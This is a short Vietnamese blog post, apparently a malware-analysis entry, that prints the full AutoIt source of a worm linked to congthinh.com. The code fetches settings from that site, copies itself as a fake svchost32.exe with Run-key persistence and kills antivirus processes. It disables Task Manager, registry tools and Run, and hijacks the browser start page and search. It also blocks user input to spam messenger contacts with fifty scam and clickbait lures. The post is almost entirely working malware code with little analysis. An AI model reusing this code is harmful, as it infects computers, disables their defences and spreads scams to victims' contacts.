Mar 12, 2009
103 Views

autoit của công thịnh .com

Written by

code virut auto it của site congthinh.com
vẫn là autoit như mọi lần… nhưng lần này có thêm 1 số file mới

extract ra file .jpg đổi đuôi thành .zip và extract 1 lần nữa
pass: 123456
Các file extract ra:
apps.dat
inst.dat
mc.dat
pk.bin
rinst.exe
titles.dat
vinh.exe
Xinh.exe
Xinhhk.dll

code:

#NoTrayIcon
InetGet("http://congthinh.com/vinh.txt", @WindowsDir & "vinhauto.txt", 1, 0)
$FILE = FileOpen(@WindowsDir & "vinhauto.txt", 0)
$LINK = FileReadLine($FILE, 1)
$LINK2 = FileReadLine($FILE, 2)
$WEBSITE = FileReadLine($FILE, 3)
DirCreate(@WindowsDir & "systemsystem32")
FileCopy(@AutoItExe, @WindowsDir & "systemsystem32svchost32.exe")
FileDelete("C:Documents and Settings" & @UserName & "Cookies*.txt")
FileDelete(@WindowsDir & "systemsvchost.exe")
FileDelete(@WindowsDir & "systemsvchost32.exe")
FileDelete(@WindowsDir & "svchost32.exe")
FileDelete(@WindowsDir & "svchost.exe")
FileDelete(@WindowsDir & "updt.exe")
$VAR = DriveGetDrive("all")
FileDelete("" & $VAR & "auto.exe")
RegDelete("HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentVersionRun", "SVCHOST")
If ProcessExists("Bkav2006.exe") Then
	ProcessClose("Bkav2006.exe")
EndIf
If ProcessExists("FastHelper.exe") Then
	ProcessClose("FastHelper.exe")
EndIf
If ProcessExists("bdss.exe") Then
	ProcessClose("bdss.exe")
	ProcessClose("vsserv.exe")
EndIf
RegWrite("HKEY_CURRENT_USERSoftwarePoliciesMicrosoftInternet ExplorerControl Panel", "Homepage", "REG_DWORD", "1")
RegWrite("HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionPoliciesSystem", "DisableTaskMgr", "REG_DWORD", "1")
RegWrite("HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionPoliciesSystem", "DisableRegistryTools", "REG_DWORD", "1")
RegWrite("HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorer", "NoRun", "REG_DWORD", "1")
RegWrite("HKEY_CURRENT_USERSoftwareMicrosoftInternet ExplorerMain", "Start Page", "REG_SZ", $WEBSITE)
RegWrite("HKEY_CURRENT_USERSoftwareYahoopagerViewYMSGR_buzz", "content url", "REG_SZ", $WEBSITE)
RegWrite("HKEY_CURRENT_USERSoftwareYahoopagerViewYMSGR_Launchcast", "content url", "REG_SZ", $WEBSITE)
RegWrite("HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentVersionRun", "Task Manager", "REG_SZ", @WindowsDir & "systemsystem32svchost32.exe")
RegWrite("HKEY_CURRENT_USERSoftwareGoogleGoogleToolbarNotifier", "KeepDS", "REG_DWORD", "0")
RegWrite("HKEY_CURRENT_USERSoftwareMicrosoftSearch Assistant", "DefaultSearchURL", "REG_SZ", "http://congthinh.com/?search=")
RegWrite("HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorer", "NoRun", "REG_DWORD", "1")
Dim $TIN[50]
$TIN[0] = "Twenty-five dollars is to much to pay for that shirt : " & $LINK & "shirt.jpg   "
$TIN[1] = "I earn as much money as my website " & $LINK & "   "
$TIN[2] = "People belive that we wanted men is living near you " & $LINK & "wanted.jpg  be careful !!!    "
$TIN[3] = "People allege that he stole 100000 Dollars : " & $LINK & "hisimages.jpg   "
$TIN[4] = "I look radian in my new dress : " & $LINK & "newdress.jpg :x :x   "
$TIN[5] = "What a interesting film !!! " & $LINK & "film.wmv It's the most interesting film i've ever seen   "
$TIN[6] = ":)) My family was elated by the news . I won an iPhone. You will never believe it :O " & $LINK & "mylottery.jpg     "
$TIN[7] = "This is my one-off Xmase-card for you ^_^  " & $LINK & "?id=ecard Very nice !!! =))   "
$TIN[8] = "you are virus infected . Use this tool to remove viruses from your PC : " & $LINK & "?id=virus_shield    "
$TIN[9] = "Microsoft to release 2007 free-of-charge packs of Windows Vista for its first 2007 online registered users: " & $LINK & "?id=vista   "
$TIN[10] = "Breaking news : Osama Bin Laden has been arrested !! : " & $LINK & "?id=news   "
$TIN[11] = "My new personal website: " & $LINK & "   c0ol !!! "
$TIN[12] = "OMG !!! Google was hacked : " & $LINK & "?id=google     "
$TIN[13] = ":D who is beside you in this pic " & $LINK2 & "friendpic.gif so good-looking   "
$TIN[14] = ";) 1 of my vacation pictures " & $LINK2 & "vacation.gif < :-P  "
$TIN[15] = "hot pics this week " & $LINK2 & "hot.gif :x cool !!!  "
$TIN[16] = ";) 1 of my vacation pictures " & $LINK2 & "vacation.gif <:-P "
$TIN[17] = "Screenshot of my new Ipod " & $LINK2 & "ipod.gif so cool :D "
$TIN[18] = "never click into the links like something in this image " & $LINK2 & "dontclick.gif #:-S !!!  "
$TIN[19] = "Images shot in Viet Nam _ The war will never end " & $LINK2 & "VietNamWar.gif << :( "
$TIN[20] = ":( the page cannot be displayed " & $LINK2 & "error.gif Something was wrong !!! Check it again and tell me later. THanks !!!"
$TIN[21] = "My pics with my new lover " & $LINK2 & "mypics.gif :x b-( "
$TIN[22] = "New game  ;;) sexy beach 3 (man only) " & $LINK2 & "MissWorld.gif Ha Ha Ha!! "
$TIN[23] = "Do you realize who is in this image: " & $LINK2 & "who.gif . Just think for a moment and tell me soon ;))"
$TIN[24] = "damn it , she is so cute :x : " & $LINK2 & "girlcute.gif ... who is she ... do you know she ?"
$TIN[25] = "Be careful. There'll be earthquake tonight !!!  :  " & $LINK2 & "ghost.gif "
$TIN[26] = "I made 50 gifts for the first 50 people post comments on my own page :   " & $LINK2 & " "
$TIN[27] = "My new personal website: :   " & $LINK2 & " so c00l !!! "
$TIN[28] = "Yahoo to charge fee for its YM service :   " & $LINK2 & "?id=yahoo !!! "
$TIN[29] = "OMG ! She is really beautiful :x    " & $LINK2 & "DSC017473.GIF !!! "
$TIN[30] = "Download free MP3s     " & $LINK2 & "  "
$TIN[31] = "A new dangerous computer virus that can destroys all your data has just been released . Click here to know how to avoid it :  : " & $LINK2 & "?id=pc_protector ."
$TIN[32] = "You are Yahoo Winner .... Click Here to get a FREE SMART PHONE  : " & $LINK2 & "?id=yahoowinner ."
$TIN[33] = "Big, Beautiful & Single?Join a community for big beautiful women and those who admire them  : " & $LINK2 & "girlcute.gif ."
$TIN[34] = "oh my god , FREE  KOHLS $500 GIFT CARD! Warning:  Offer is EXTREMELY limited!  Get Yours Now! : " & $LINK2 & "?id=get ."
$TIN[35] = "Congratulations!You have been selected to receive a FREE* wireless MotoQ™ 9h smartphone .Click here   to see " & $LINK2 & "?id=MotoQ™ ."
$TIN[36] = "You're a YAHOO winner!A Free Laptop for You.Click check it out " & $LINK2 & "?id=yahoowinner ."
$TIN[37] = "Free Hot Sex Movies " & $LINK2 & "hotsex.wmv ."
$TIN[38] = "Kho Anh Avatar Dep Co Tai " & $LINK2 & "avatar.php ."
$TIN[39] = "Nhung Hinh Anh Hot Nhat Co Tai: " & $LINK2 & "hot.jpg ."
$TIN[40] = "Hoa Hau Hoan Vu 2008 Co Tai: " & $LINK2 & "hoahau.jpg ."
$TIN[41] = "Nhung Tin Tuc Moi Nhat Co Tai: " & $LINK2 & "news.php ."
$TIN[42] = "Em xinh qua,Toan nhung em mac bikini nong bong , hap dan , nhin ma them :P  " & $LINK2 & "bikini.php ."
$TIN[43] = "1 thang o tren mang kiem 2000$ , tai sao ban khong thu?  " & $LINK2 & "kiemtien.php ."
$TIN[44] = "Tai sao anh? cua ban. lai. co' o? day ne`  " & $LINK2 & "webcam.jpg ."
$TIN[45] = "Vao day de bau chon cho Hoa Hau VN  " & $LINK2 & "bauchon.php ."
$TIN[46] = "Website moi' lam` , vao` tham quan ti' di  " & $LINK2 & " ."
$TIN[47] = "CLUB Tuoi? TEEN  " & $LINK2 & "teen.php ."
$TIN[48] = " Anh? moi' cua? Thuy TOP (Qua? boom tan^ VN)  " & $LINK2 & "thuytop.gif ."
$TIN[49] = " Paris Hilton chup anh? NUDE ne , nguoi` dep the)  " & $LINK2 & "paris.jpg ."
While (1)
	Sleep(30000)
	$TIEUDE0 = WinGetTitle("My Computer", "")
	$KIEMTRA0 = WinExists($TIEUDE0)
	$TIEUDE0X = WinGetTitle("Windows Explorer", "")
	$KIEMTRA0X = WinExists($TIEUDE0X)
	$TIEUDE1 = WinGetTitle("Yahoo! Messenger", "")
	$KIEMTRA1 = WinExists($TIEUDE1)
	$TIEUDE2 = WinGetTitle("AIM", "")
	$KIEMTRA2 = WinExists($TIEUDE2)
	$TIEUDE3 = WinGetTitle("Windows Live Messenger", "")
	$KIEMTRA3 = WinExists($TIEUDE3)
	$TIEUDE4 = WinGetTitle("Windows Messenger", "")
	$KIEMTRA4 = WinExists($TIEUDE4)
	$TIEUDE5 = WinGetTitle("Yahoo!7 Messenger", "")
	$KIEMTRA5 = WinExists($TIEUDE5)
	If $KIEMTRA0 = 1 Then
		ClipPut($WEBSITE)
		BlockInput(1)
		WinActivate($TIEUDE0)
		Send("{F6}")
		Send("^v {ENTER}")
		BlockInput(0)
	EndIf
	If $KIEMTRA0X = 1 Then
		ClipPut($WEBSITE)
		BlockInput(1)
		WinActivate($TIEUDE0X)
		Send("{F6}")
		Send("^v {ENTER}")
		BlockInput(0)
	EndIf
	If $KIEMTRA1 = 1 Then
		$NGAUNHIEN = Random(0, 49, 1)
		ClipPut($TIN[$NGAUNHIEN])
		BlockInput(1)
		WinActivate($TIEUDE1)
		Send("!m")
		Send("un")
		Send("^v {ENTER}{ENTER}")
		Send("^m")
		Send("{DOWN}")
		Send("^{SHIFTDOWN}{END}{SHIFTUP}")
		Send("{ENTER}")
		Send("^v")
		Send("!s")
		BlockInput(0)
	EndIf
	If $KIEMTRA2 = 1 Then
		$NGAUNHIEN = Random(0, 49, 1)
		ClipPut($TIN[$NGAUNHIEN])
		BlockInput(1)
		WinActivate($TIEUDE2)
		Send("{HOME}")
		Send("{DOWN}")
		Send("^{SHIFTDOWN}{PGDN}{SHIFTUP}")
		Send("{ENTER}")
		Send("^v {ENTER}")
		Send("!{F4}")
		Send("!{F4}")
		BlockInput(0)
	EndIf
	If $KIEMTRA3 = 1 Then
		$NGAUNHIEN = Random(0, 49, 1)
		ClipPut($TIN[$NGAUNHIEN])
		BlockInput(1)
		WinActivate($TIEUDE3)
		Send("{ALT}")
		Send("a")
		Send("{ENTER}")
		Send("{SPACE}")
		Send("{DOWN}")
		Send("{SPACE}")
		Send("{DOWN}")
		Send("{SPACE}")
		Send("{DOWN}")
		Send("{SPACE}")
		Send("{DOWN}")
		Send("{SPACE}")
		Send("{DOWN}")
		Send("{SPACE}")
		Send("{DOWN}")
		Send("{SPACE}")
		Send("{DOWN}")
		Send("{SPACE}")
		Send("{DOWN}")
		Send("{SPACE}")
		Send("{DOWN}")
		Send("{SPACE}")
		Send("{DOWN}")
		Send("{SPACE}")
		Send("{ENTER}")
		Send("^v {ENTER}")
		Send("!{F4}")
		BlockInput(0)
	EndIf
	If $KIEMTRA4 = 1 Then
		$NGAUNHIEN = Random(0, 49, 1)
		ClipPut($TIN[$NGAUNHIEN])
		BlockInput(1)
		WinActivate($TIEUDE4)
		Send("{ALT}")
		Send("a")
		Send("{ENTER}")
		Send("{DOWN}")
		Send("{DOWN}")
		Send("{DOWN}")
		Send("{DOWN}")
		Send("{ENTER}")
		Send("^v {ENTER}")
		Send("!{F4}")
		Send("{ALT}")
		Send("a")
		Send("{ENTER}")
		Send("{DOWN}")
		Send("{DOWN}")
		Send("{DOWN}")
		Send("{DOWN}")
		Send("{DOWN}")
		Send("{ENTER}")
		Send("^v {ENTER}")
		Send("!{F4}")
		Send("{ALT}")
		Send("a")
		Send("{ENTER}")
		Send("{DOWN}")
		Send("{DOWN}")
		Send("{DOWN}")
		Send("{DOWN}")
		Send("{DOWN}")
		Send("{DOWN}")
		Send("{ENTER}")
		Send("^v {ENTER}")
		Send("!{F4}")
		Send("{ALT}")
		Send("a")
		Send("{ENTER}")
		Send("{DOWN}")
		Send("{DOWN}")
		Send("{DOWN}")
		Send("{DOWN}")
		Send("{DOWN}")
		Send("{DOWN}")
		Send("{DOWN}")
		Send("{ENTER}")
		Send("^v {ENTER}")
		Send("!{F4}")
		Send("{ALT}")
		Send("a")
		Send("{ENTER}")
		Send("{DOWN}")
		Send("{DOWN}")
		Send("{DOWN}")
		Send("{DOWN}")
		Send("{DOWN}")
		Send("{DOWN}")
		Send("{DOWN}")
		Send("{DOWN}")
		Send("{ENTER}")
		Send("^v {ENTER}")
		Send("!{F4}")
		Send("{ALT}")
		Send("a")
		Send("{ENTER}")
		Send("{DOWN}")
		Send("{DOWN}")
		Send("{DOWN}")
		Send("{DOWN}")
		Send("{DOWN}")
		Send("{DOWN}")
		Send("{DOWN}")
		Send("{DOWN}")
		Send("{DOWN}")
		Send("{ENTER}")
		Send("^v {ENTER}")
		Send("!{F4}")
		BlockInput(0)
	EndIf
	If $KIEMTRA5 = 1 Then
		$NGAUNHIEN = Random(0, 49, 1)
		ClipPut($TIN[$NGAUNHIEN])
		BlockInput(1)
		WinActivate($TIEUDE5)
		Send("!m")
		Send("un")
		Send("^v {ENTER}{ENTER}")
		Send("^m")
		Send("{DOWN}")
		Send("^{SHIFTDOWN}{END}{SHIFTUP}")
		Send("{ENTER}")
		Send("^v")
		Send("!s")
		BlockInput(0)
	EndIf
	Sleep(900000)
WEnd
Article Tags:
· ·
Article Categories:
Virut/Trojan
    http://linholiver.com

    https://linholiver.com/diary/about/